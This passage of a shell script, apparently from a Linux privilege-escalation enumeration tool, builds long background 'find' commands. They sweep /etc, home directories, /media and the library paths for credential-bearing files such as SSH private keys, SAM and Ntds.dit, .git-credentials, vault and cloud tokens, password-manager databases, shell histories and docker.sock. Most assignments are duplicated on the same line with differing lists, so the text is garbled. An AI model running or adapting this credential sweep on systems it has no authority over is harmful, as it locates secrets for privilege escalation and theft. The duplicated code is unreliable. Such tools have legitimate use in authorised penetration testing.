-name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"*knockd*\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_ETC=`eval_bckgrd "find /etc -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"*knockd*\" -o -name \".gitconfig\" -o -name \"drives.xml\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"ssh*config\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_HOMESEARCH=`eval_bckgrd "find $HOMESEARCH -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \"ssh*config\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name \"backup\" -o -name \"ConsoleHost_history.txt\" -o -name \"TokenCache.dat\" -o -name \"postgresql.conf\" -o -name \"creds*\" -o -name \"*vnc*.xml\" -o -name \"FreeSSHDservice.ini\" -o -name \"appcmd.exe\" -o -name \"vault-ssh-helper.hcl\" -o -name \"AppEvent.Evt\" -o -name \"scheduledtasks.xml\" -o -name \"credentials\" -o -name \"*.ovpn\" -o -name \".ldaprc\" -o -name \"ddclient.conf\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_LIB=`eval_bckgrd "find /lib -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB=`eval_bckgrd "find /lib -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB32=`eval_bckgrd "find /lib32 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_LIB64=`eval_bckgrd "find /lib64 -name \"*.timer\" -o -name \"*.socket\" -o -name \"*.service\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"`
FIND_MEDIA=`eval_bckgrd "find /media -name \"ddclient.conf\" -o -name \"database.php\" -o -name \"*vnc*.ini\" -o -name \".google_authenticator\" -o -name \"ntuser.dat\" -o -name \"*credential*\" -o -name \"credentials\" -o -name \"setupinfo\" -o -name \"*.kdbx\" -o -name \"gitlab.yml\" -o -name \"KeePass.config*\" -o -name \"https.conf\" -o -name \"NetSetup.log\" -o -name \".*_history.*\" -o -name \".msmtprc\" -o -name \".lesshst\" -o -name \"passbolt.php\" -o -name \"KeePass.ini\" -o -name \"error.log\" -o -name \"*.swp\" -o -name \"filezilla.xml\" -o -name \"AzureRMContext.json\" -o -name \"datasources.xml\" -o -name \"kibana.y*ml\" -o -name \"groups.xml\" -o -name \"*.p12\" -o -name \"scclient.exe\" -o -name \"pgadmin*.db\" -o -name \"SYSTEM\" -o -name \"docker-compose.yml\" -o -name \"known_hosts\" -o -name \"setupinfo.bak\" -o -name \".env\" -o -name \"*.db\" -o -name \".pypirc\" -o -name \"cloud.cfg\" -o -name \"*.sqlite\" -o -name \"*.csr\" -o -name \"drives.xml\" -o -name \"*.rdg\" -o -name \".ldaprc\" -o -name \"my.cnf\" -o -name \"access.log\" -o -name \"krb5.keytab\" -o -name \"mosquitto.conf\" -o -name \"racoon.conf\" -o -name \"mongod*.conf\" -o -name \"TokenCache.dat\" -o -name \"iis6.log\" -o -name \"php.ini\" -o -name \"rsyncd.secrets\" -o -name \".erlang.cookie\" -o -name \"wcx_ftp.ini\" -o -name \".sudo_as_admin_successful\" -o -name \"snmpd.conf\" -o -name \"supervisord.conf\" -o -name \"fastcgi_params\" -o -name \"db.php\" -o -name \"ftp.ini\" -o -name \"hostapd.conf\" -o -name \"security.sav\" -o -name \"*.timer\" -o -name \"*.der\" -o -name \"scheduledtasks.xml\" -o -name \"ipsec.conf\" -o -name \"bash.exe\" -o -name \"*config*.php\" -o -name \"debian.cnf\" -o -name \"httpd.conf\" -o -name \"hosts.equiv\" -o -name \"*.socket\" -o -name \"*.service\" -o -name \"ws_ftp.ini\" -o -name \"sites.ini\" -o -name \"psk.txt\" -o -name \".profile\" -o -name \"*.ovpn\" -o -name \"*.jks\" -o -name \".recently-used.xbel\" -o -name \"*.cer\" -o -name \"kadm5.acl\" -o -name \"software\" -o -name \"backup\" -o -name \"*vnc*.xml\" -o -name \"krb5.conf\" -o -name \"gvm-tools.conf\" -o -name \".wgetrc\" -o -name \".vault-token\" -o -name \"*.gnupg\" -o -name \"printers.xml\" -o -name \"pg_hba.conf\" -o -name \"wsl.exe\" -o -name \"*vnc*.txt\" -o -name \".git-credentials\" -o -name \"cesi.conf\" -o -name \"ipsec.secrets\" -o -name \"index.dat\" -o -name \"my.ini\" -o -name \"*.pfx\" -o -name \"unattend.xml\" -o -name \".git\" -o -name \"unattended.xml\" -o -name \"authorized_keys\" -o -name \"docker.socket\" -o -name \"rsyncd.conf\" -o -name \"zabbix_server.conf\" -o -name \"*.viminfo\" -o -name \"access_tokens.db\" -o -name \"unattend.txt\" -o -name \"secrets.ldb\" -o -name \"sitemanager.xml\" -o -name \"credentials.db\" -o -name \"sssd.conf\" -o -name \"postgresql.conf\" -o -name \"web*.config\" -o -name \"ConsoleHost_history.txt\" -o -name \"tomcat-users.xml\" -o -name \"server.xml\" -o -name \"mariadb.cnf\" -o -name \"*.pem\" -o -name \"*password*\" -o -name \"*.keyring\" -o -name \".rhosts\" -o -name \".github\" -o -name \"access_tokens.json\" -o -name \"azureProfile.json\" -o -name \".htpasswd\" -o -name \"config.php\" -o -name \"software.sav\" -o -name \"recentservers.xml\" -o -name \"*.ftpconfig\" -o -name \"passwd\" -o -name \"autologin.conf\" -o -name \"zabbix_agentd.conf\" -o -name \"secrets.yml\" -o -name \"system.sav\" -o -name \"unattend.inf\" -o -name \"SecEvent.Evt\" -o -name \"appcmd.exe\" -o -name \"sysprep.xml\" -o -name \"legacy_credentials.db\" -o -name \"elasticsearch.y*ml\" -o -name \"SAM\" -o -name \"https-xampp.conf\" -o -name \"sysprep.inf\" -o -name \"backups\" -o -name \"influxdb.conf\" -o -name \"KeePass.enforced*\" -o -name \"ffftp.ini\" -o -name \"000-default.conf\" -o -name \"authorized_hosts\" -o -name \"vault-ssh-helper.hcl\" -o -name \"settings.php\" -o -name \"*.pgp\" -o -name \".plan\" -o -name \"*.key\" -o -name \".secrets.mkey\" -o -name \"autologin\" -o -name \"id_dsa*\" -o -name \"FreeSSHDservice.ini\" -o -name \"redis.conf\" -o -name \"AppEvent.Evt\" -o -name \"RDCMan.settings\" -o -name \"accessTokens.json\" -o -name \"Ntds.dit\" -o -name \"storage.php\" -o -name \"*.gpg\" -o -name \"docker.sock\" -o -name \".bashrc\" -o -name \"sentry.conf.py\" -o -name \"wp-config.php\" -o -name \".k5login\" -o -name \"Dockerfile\" -o -name \"pagefile.sys\" -o -name \"gitlab.rm\" -o -name \"default.sav\" -o -name \"*.sqlite3\" -o -name \"winscp.ini\" -o -name \"creds*\" -o -name \"kcpassword\" -o -name \"*.crt\" -o -name \"anaconda-ks.cfg\" -o -name \".gitconfig\" -o -name \"pgsql.conf\" -o -name \"*.keystore\" -o -name \"id_rsa*\" -o -name \"ftp.config\" -o -name \"*vnc*.c*nf*\" -o -name \"protecteduserkey.bin\" 2>/dev/null | sort; printf \\\$YELLOW'. '\\\$NC 1>&2;"` FIND_MEDIA=`eval_bckgrd "find /media -name \"racoon.conf\" -o -name \".sudo_as_admin_successful\" -o -name \"psk.txt\" -o -name \"filezilla.xml\" -o -name \"rsyncd.secrets\" -o -name \"secrets.ldb\" -o -name \"pagefile.sys\" -o -name \"docker.socket\" -o -name \"setupinfo.bak\" -o -name \"supervisord.conf\" -o -name \"unattend.txt\" -o -name \".recently-used.xbel\" -o -name \"setupinfo\" -o -name \"*.csr\" -o -name \"software.sav\" -o -name \".git\" -o -name \"mariadb.cnf\" -o -name \"accessTokens.json\" -o -name \".bashrc\" -o -name \".plan\" -o -name \"settings.php\" -o -name \".github\" -o -name \"authorized_hosts\" -o -name \"cloud.cfg\" -o -name \"*config*.php\" -o -name \"azureProfile.json\" -o -name \"autologin\" -o -name \"*.db\" -o -name \".k5login\" -o -name \"*.sqlite\" -o -name \"SYSTEM\" -o -name \"default.sav\" -o -name \"software\" -o -name \"httpd.conf\" -o -name \".vault-token\" -o -name \"sites.ini\" -o -name \"db.php\" -o -name \".htpasswd\" -o -name \".*_history.*\" -o -name \"wp-config.php\" -o -name \"config.php\" -o -name \"Dockerfile\" -o -name \"authorized_keys\" -o -name \"*.der\" -o -name \"sitemanager.xml\" -o -name \"KeePass.enforced*\" -o -name \"*.p12\" -o -name \"*.kdbx\" -o -name \"pg_hba.conf\" -o -name \"*.keyring\" -o -name \"ipsec.secrets\" -o -name \"*credential*\" -o -name \".wgetrc\" -o -name \"ipsec.conf\" -o -name \"sysprep.inf\" -o -name \"passwd\" -o -name \"drives.xml\" -o -name \".gitconfig\" -o -name \"ftp.config\" -o -name \".secrets.mkey\" -o -name \"legacy_credentials.db\" -o -name \"wcx_ftp.ini\" -o -name \"id_dsa*\" -o -name \".erlang.cookie\" -o -name \"krb5.keytab\" -o -name \"mongod*.conf\" -o -name \"unattended.xml\" -o -name \"influxdb.conf\" -o -name \"docker.sock\" -o -name \"zabbix_agentd.conf\" -o -name \"gitlab.rm\" -o -name \"scclient.exe\" -o -name \"*.cer\" -o -name \"gvm-tools.conf\" -o -name \"kadm5.acl\" -o -name \"*.gpg\" -o -name \"tomcat-users.xml\" -o -name \"AzureRMContext.json\" -o -name \"error.log\" -o -name \"sysprep.xml\" -o -name \".git-credentials\" -o -name \"kcpassword\" -o -name \"*.swp\" -o -name \"KeePass.config*\" -o -name \"winscp.ini\" -o -name \".profile\" -o -name \"my.ini\" -o -name \"printers.xml\" -o -name \"elasticsearch.y*ml\" -o -name \"SecEvent.Evt\" -o -name \"ffftp.ini\" -o -name \"anaconda-ks.cfg\" -o -name \"php.ini\" -o -name \"credentials.db\" -o -name \"*.jks\" -o -name \"index.dat\" -o -name \"recentservers.xml\" -o -name \"*vnc*.txt\" -o -name \"my.cnf\" -o -name \"*.keystore\" -o -name \"*password*\" -o -name \"database.php\" -o -name \"hosts.equiv\" -o -name \"bash.exe\" -o -name \"backups\" -o -name \"docker-compose.yml\" -o -name \".env\" -o -name \"*.socket\" -o -name \"access_tokens.json\" -o -name \"*.gnupg\" -o -name \"protecteduserkey.bin\" -o -name \"system.sav\" -o -name \"security.sav\" -o -name \"kibana.y*ml\" -o -name \"jetty-realm.properties\" -o -name \"known_hosts\" -o -name \"datasources.xml\" -o -name \"rsyncd.conf\" -o -name \"ws_ftp.ini\" -o -name \"https-xampp.conf\" -o -name \"cesi.conf\" -o -name \"access_tokens.db\" -o -name \"autologin.conf\" -o -name \"unattend.inf\" -o -name \"*.rdg\" -o -name \"*.ftpconfig\" -o -name \"hostapd.conf\" -o -name \"groups.xml\" -o -name \"sssd.conf\" -o -name \"*.pem\" -o -name \"*.service\" -o -name \"*vnc*.ini\" -o -name \"web*.config\" -o -name \"*.pgp\" -o -name \".pypirc\" -o -name \"sentry.conf.py\" -o -name \"*.pfx\" -o -name \"*.crt\" -o -name \"snmpd.conf\" -o -name \"Ntds.dit\" -o -name \"access.log\" -o -name \"unattend.xml\" -o -name \".msmtprc\" -o -name \"*vnc*.c*nf*\" -o -name \"storage.php\" -o -name \"passbolt.php\" -o -name \"SAM\" -o -name \"mosquitto.conf\" -o -name \".lesshst\" -o -name \"zabbix_server.conf\" -o -name \"NetSetup.log\" -o -name \".google_authenticator\" -o -name \"pgsql.conf\" -o -name \"https.conf\" -o -name \"fastcgi_params\" -o -name \"secrets.yml\" -o -name \"pgadmin*.db\" -o -name \"wsl.exe\" -o -name \"ftp.ini\" -o -name \"*.timer\" -o -name \"id_rsa*\" -o -name \"KeePass.ini\" -o -name \"gitlab.yml\" -o -name \".rhosts\" -o -name \"*.key\" -o -name \"*.sqlite3\" -o -name \"RDCMan.settings\" -o -name \"ntuser.dat\" -o -name \"server.xml\" -o -name \"redis.conf\" -o -name \"debian.cnf\" -o -name \"iis6.log\" -o -name \"*.viminfo\" -o -name \"000-default.conf\" -o -name \"krb5.conf\" -o -name 